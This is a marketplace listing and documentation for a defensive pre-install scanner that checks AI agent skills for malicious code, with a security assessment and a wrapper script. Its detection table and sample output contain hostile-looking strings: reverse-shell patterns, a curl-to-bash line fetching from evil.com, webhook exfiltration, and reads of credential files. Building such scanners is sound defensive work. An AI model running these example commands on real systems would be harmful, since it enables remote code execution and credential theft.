Clawhub Skill Scanner

v0.1.0

Security gatekeeper for skill installations. MANDATORY before installing any skill from ClawHub, GitHub, or external sources. Performs deep code analysis to detect malicious patterns, credential access, data exfiltration, command injection, and other security risks. Triggers: "install skill", "clawhub install", "new skill", "add skill", "skill from". Always run this BEFORE installation.

⭐ 1· 1.7k·6 current·6 all-time

by@amir-ag

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for amir-ag/clawhub-skill-scanner.

Previewing Install & Setup.

Prompt PreviewInstall & Setup

Install the skill "Clawhub Skill Scanner" (amir-ag/clawhub-skill-scanner) from ClawHub.
Skill page: https://clawhub.ai/amir-ag/clawhub-skill-scanner
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install clawhub-skill-scanner

ClawHub CLI

Package manager switcher

npx clawhub@latest install clawhub-skill-scanner

Security Scan

VirusTotal

Benign

View report →

OpenClaw

Benign

medium confidence

✓

Purpose & Capability

Name/description claim a pre-install security scanner and the package includes a Python scanner (scripts/scan_skill.py) plus documentation implementing that purpose. It does not request unrelated credentials, binaries, or configuration paths.

ℹ

Instruction Scope

SKILL.md instructs the agent/user to run the included Python scanner against a skill folder and shows a wrapper that fetches a skill and scans it before install — this matches the stated purpose. Minor concerns: the doc repeatedly calls the scan 'MANDATORY' and lists triggers (e.g., 'install skill') but the skill metadata doesn't enforce mandatory execution; the wrapper script assumes clawhub inspect is available at runtime and the path to the scanner is correct. Also review the scanner's whitelist and pattern choices (e.g., some generic whitelist entries like '# ' and 'https://api.' may suppress matches in comments or API URLs).

✓

Install Mechanism

No install spec/external downloads; code lives in the skill bundle. This minimizes supply-chain risk since nothing is fetched or executed by an automated install step in the skill itself.

✓

Credentials

The skill requires no environment variables, credentials, or privileged config paths. The scanner looks for references to credentials in scanned code (e.g., ~/.ssh, ~/.aws, .env) which is appropriate for its purpose.

✓

Persistence & Privilege

Skill is not marked always:true and does not request persistent privileges. The SKILL.md suggests a wrapper to run the scanner before installs, but the skill itself does not modify other skill configs or system-wide settings.

Scan Findings in Context

[pattern-definitions-included] expected: The scanner includes many regex patterns that match suspicious behavior (curl|bash, webhooks, .env files, reverse-shell patterns). This is expected for a static pattern-based scanner.

[examples-containing-dangerous-strings] expected: README/SKILL.md contain example dangerous snippets (curl | bash, webhook URLs) used to demonstrate findings. Those example strings could trigger other naive scanners but are expected here as documentation/examples.

Assessment

This skill appears to do what it says: a local pattern-based scanner you can run before installing skills. Before trusting it as your only defense: 1) Verify the scanner's source (owner and repo) and ensure you obtained the package from a trusted location — the provided metadata has no homepage and an unfamiliar owner ID. 2) Inspect scripts/scan_skill.py yourself (or in a sandbox/CI) to confirm the rule set matches your threat model and to tune whitelist/blacklist rules to avoid false positives/negatives. 3) Don't rely solely on this tool: pattern-based scanners can miss obfuscated or logic-based exfiltration and can also produce false positives; combine with manual review or runtime sandboxing for high-risk skills. 4) If you plan to integrate the wrapper into an automated install pipeline, ensure the wrapper's paths are correct and run the scanner from a controlled environment (CI or isolated host) so it cannot be tricked into scanning arbitrary system paths. If you want higher assurance, request a published repository URL or signed release for provenance — absence of a homepage/repo reduces confidence.

Like a lobster shell, security has layers — review code before you run it.

latestvk979r2ht93jb6rwt1rfbwxadys80n84m

1.7kdownloads

1stars

1versions

Updated 2mo ago

v0.1.0

MIT-0

Skill Security Audit

MANDATORY security check before installing external skills.

Inspired by the ClawHavoc campaign that compromised 341 malicious skills on ClawHub.

When to Use

Run this audit BEFORE any skill installation:

clawhub install <skill>
Manual skill download/copy
Skills from GitHub, URLs, or untrusted sources

Quick Start

# Scan a skill folder
python3 scripts/scan_skill.py /path/to/skill

# JSON output for automation
python3 scripts/scan_skill.py /path/to/skill --json

# Exit code 0 only if SAFE
python3 scripts/scan_skill.py /path/to/skill --install-if-safe

What It Detects

🔴 CRITICAL (Blocks Installation)

Category	Patterns
Reverse Shells	`nc -e`, `bash /dev/tcp`, Python socket shells
Curl-Pipe-Bash	`curl \| bash`, `wget && chmod +x`
Credential Access	~/.ssh, ~/.aws, ~/.openclaw, .env files
Data Exfiltration	Discord/Slack webhooks, POST with secrets
Malicious Domains	glot.io, pastebin (known malware hosts)
Persistence	crontab, systemd, LaunchAgents, .bashrc
Command Injection	eval(), exec(), subprocess shell=True
Obfuscation	base64 decode pipes, pickle, marshal

🟡 WARNING (Review Required)

Only patterns that are suspicious regardless of skill type:

Raw socket usage (unusual for most skills)
Dynamic code compilation
File/directory deletion
Screenshot/keyboard capture libraries
Low-level system calls (ctypes)

Philosophy

We intentionally don't warn on common patterns like:

HTTP requests (normal for API skills)
API key references (normal for integration skills)
File writes (normal for data skills)
Environment variable access (normal for config)

This reduces noise so real threats stand out.

Risk Scoring

CRITICAL findings × 30 = Base score
WARNING findings × 3 (capped at 10) = Warning contribution

Score	Level	Action
0-20	🟢 SAFE	Auto-approve
21-50	🟡 CAUTION	Review findings
51-80	🔶 DANGER	Detailed review required
81-100	🔴 BLOCKED	Do NOT install

Sample Output

════════════════════════════════════════════════════════════
  SKILL SECURITY AUDIT: suspicious-skill
════════════════════════════════════════════════════════════

📊 RISK SCORE: 90/100 - 🔴 BLOCKED

🔴 CRITICAL FINDINGS (3)
  [install.py:15] Curl pipe to shell (DANGEROUS!)
    Code: os.system('curl https://evil.com/x.sh | bash')
  [setup.py:42] Discord webhook exfiltration
    Code: requests.post('https://discord.com/api/webhooks/...')
  [run.py:8] ClawdBot .env access (ClawHavoc target!)
    Code: open(os.path.expanduser('~/.clawdbot/.env'))

📁 FILES SCANNED: 5
📏 TOTAL LINES: 230

════════════════════════════════════════════════════════════
  🔴 BLOCK - Do NOT install this skill
════════════════════════════════════════════════════════════

Integration with clawhub

Create a wrapper script to auto-scan before installation:

#!/bin/bash
# clawhub-secure: Scan before install

SKILL="$2"
TEMP="/tmp/skill-audit-$$"

# Fetch without installing
clawhub inspect "$SKILL" --out "$TEMP"

# Scan
python3 /path/to/scan_skill.py "$TEMP" --install-if-safe
if [ $? -eq 0 ]; then
    clawhub install "$SKILL"
else
    echo "🔴 Installation blocked by security scan"
    exit 1
fi

rm -rf "$TEMP"

References

See references/threat-patterns.md for detailed pattern explanations.

Credits

Developed in response to the ClawHavoc campaign (Feb 2026) that demonstrated large-scale supply chain attacks via AI agent skill marketplaces.

Comments

Loading comments...